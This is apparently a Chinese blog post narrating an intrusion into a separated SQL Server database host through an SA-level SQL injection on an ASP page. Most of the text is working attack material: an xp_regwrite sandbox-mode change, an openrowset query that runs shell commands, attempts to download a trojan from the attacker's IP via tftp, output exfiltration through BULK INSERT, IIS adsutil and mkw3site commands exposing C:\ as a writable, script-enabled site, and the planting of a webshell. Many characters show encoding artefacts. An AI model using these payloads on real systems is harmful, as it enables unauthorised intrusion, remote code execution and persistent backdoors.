那天，正在看資料，朋友丟了個(gè)URL過來，說是SA注入點(diǎn)，但數(shù)據(jù)庫和WEB分離的，搞了半天沒搞定.我一聽，SA注入點(diǎn)，應(yīng)該很容易的說，于是就很隨意的說，OK，沒問題，等會(huì)給結(jié)果~ 手工大概的判斷了下，的確是個(gè)SA注入點(diǎn)。判斷過程偶就不寫了，精彩的地方當(dāng)然要留到后面啦操起NBSI這把大刀就開工了。首先嘗試恢復(fù)xp_cmdshell和sp_OACreate兩擴(kuò)展存儲(chǔ),恢復(fù)后用兩擴(kuò)展存儲(chǔ)隨意執(zhí)行了一個(gè)命令，但是從回顯結(jié)果來判斷，命令沒有成功執(zhí)行。于是又恢復(fù)xp_servicecontrol擴(kuò)展存儲(chǔ)，由于該擴(kuò)展存儲(chǔ)沒有回顯，偶就隨意的ECHO了一個(gè)文件到一個(gè)指定目錄 然后用列目錄的功能把那目錄列了一遍，但并未發(fā)現(xiàn)寫入的文件。心想，應(yīng)該是管理員把那幾個(gè)常用的hacking擴(kuò)展存儲(chǔ)都給X了吧。不知道xp_regwrite擴(kuò)展存儲(chǔ)被X了沒。于是乎，手工開啟了沙盒模式
asp?idx=32;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
然后嘗試用沙盒模式往指定目錄ECHO了個(gè)文件。 asp?idx=32 and 0<>(select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd /c echo xx >c:\xxx\xxx.txt")'))--
再用列目錄的功能把該目錄給列了一遍，發(fā)現(xiàn)ECHO命令執(zhí)行成功！HOHO，還好管理員沒把這個(gè)擴(kuò)展存儲(chǔ)給X了。 有了可執(zhí)行命令的擴(kuò)展存儲(chǔ)，就有了一線希望。于是想到直接用tftp UP個(gè)馬上去。。執(zhí)行tftp -i ip get muma.exe c:\muma.exe發(fā)現(xiàn)一點(diǎn)反映也沒有。
猜測(cè)可能被管理員限制或DEL了。于是寫了一句話的下載VBS，執(zhí)行后，老半天沒發(fā)現(xiàn)我們的馬兒，難道，難道他不對(duì)外訪問？ 于是，我又執(zhí)行了IPCONGFIG命令，并ECHO到np.tmp臨時(shí)文件?？墒俏覀兛床坏紼CHO的內(nèi)容，怎么才能得到數(shù)據(jù)庫服務(wù)器的IP呢？嘿嘿，想想，他NBSI為什么能回顯呢？我們也可以那樣做。 asp?idx=32;CREATE TABLE [NP_ICEHACK](ResultTxt nvarchar(1024) NULL)-- //創(chuàng)建一個(gè)放回顯內(nèi)容的表 asp? idx=32 BULK INSERT [NP_ICEHACK] FROM 'np.tmp' WITH (KEEPNULLS);insert into [NP_ICEHACK] values ('g_over');Alter Table [NP_ICEHACK] add id int NOT NULL IDENTITY (1,1)-- //以備份的形式把臨時(shí)文件np.tmp的內(nèi)容寫入NP_ICEHACK表中 然后用NBSI直接把該表跑出來。沒過一會(huì)，可愛的IP就浮現(xiàn)在我的面前。于是再操起nmap，一陣掃描。不過掃描結(jié)果有點(diǎn)意外。就開了個(gè)80。 難道數(shù)據(jù)庫沒分離？PING下域名其IP和得到的數(shù)據(jù)庫IP是不一樣的。不管三七二十一了，先訪問再說。。馬上打上IP訪問。 發(fā)現(xiàn)一片空白，奇怪！于是再隨意打上個(gè)目錄，還是空白。傻眼了。這這。。。這端口根據(jù)nmap的判斷是IIS 5.0啊，難道誤報(bào)？ 突想，試下不就知道了。怎么個(gè)試法呢？嘿嘿，我用沙盒模式執(zhí)行了net stop w3svc命令(停止整個(gè)WEB服務(wù))。再訪問80一看。YES，訪問不到了。連那讓人郁悶的空白頁面也消失了。看來有戲，于是我再執(zhí)行net start w3svc命令(啟動(dòng)整個(gè)WEB服務(wù)).再訪問80一看，No web site is configured at this address.
呀，還有綁定域名，那不是可以做個(gè)虛擬目錄。于是執(zhí)行如下命令，查詢了幾個(gè)站點(diǎn)配置(把1依次往上加就可以看別的站點(diǎn)的配置情況) cmd /c Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs GET W3SVC/1/ServerBindings
查看第一個(gè)虛擬web站點(diǎn)的邦定端口。這里的W3SVC/1是IIS:\ LocalHostW3SVC/1的簡寫，而ServerBindings是他的屬性
還是用NBSI列出來，列到3時(shí)，發(fā)現(xiàn)其綁定了一個(gè)域名，于是執(zhí)行如下命令，添加虛擬目錄 Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs CREATE w3svc/3/Root/np "IIsWebVirtualDir"
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/root/np/Path "C:\"：
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessRead 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessWrite 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessScript 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/EnableDirBrowsing 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessSource 1
添加后高興的去訪問那域名www.xxx.com/np/結(jié)果發(fā)現(xiàn)還是www.xxx.com的內(nèi)容，懷疑沒加成功，于是隨便訪問了一個(gè)目錄，發(fā)現(xiàn)還是www.xxx.com的內(nèi)容
難道是把所有的都轉(zhuǎn)發(fā)到www.xxx.com???于是本地搭平臺(tái)測(cè)試ING。。發(fā)現(xiàn)果然如自己所料，被轉(zhuǎn)發(fā)了。
絕。。居然這樣。。經(jīng)過一段時(shí)間的思考，腦筋一轉(zhuǎn)，心想：你不讓我訪問這個(gè)站，行。。我應(yīng)承你，我自己建個(gè)站去，看你轉(zhuǎn)。哼~
于是立即執(zhí)行如下命令 cmd /c cscript c:\Inetpub\AdminScripts\mkw3site.vbs -r "c:\" -t "test" -c "LocalHost" -o "80" -h "netpatch.xx.com"
把自己的域名綁定該數(shù)據(jù)庫服務(wù)器IP。再訪問netpatch.xx.com HOHO，終于可以了。
于是立即ECHO了一句話馬上去，結(jié)束了這次hacing之旅. BTW:其實(shí)，在此次的hacking中碰到很多問題，也查閱了許多相關(guān)資料，搭平臺(tái)測(cè)試了N遍才測(cè)試OK的。并沒有文章里那么順利。難度在于，對(duì)方只開了80且把僅有的WEB給轉(zhuǎn)發(fā)了，而且又不對(duì)外訪問。

最新評(píng)論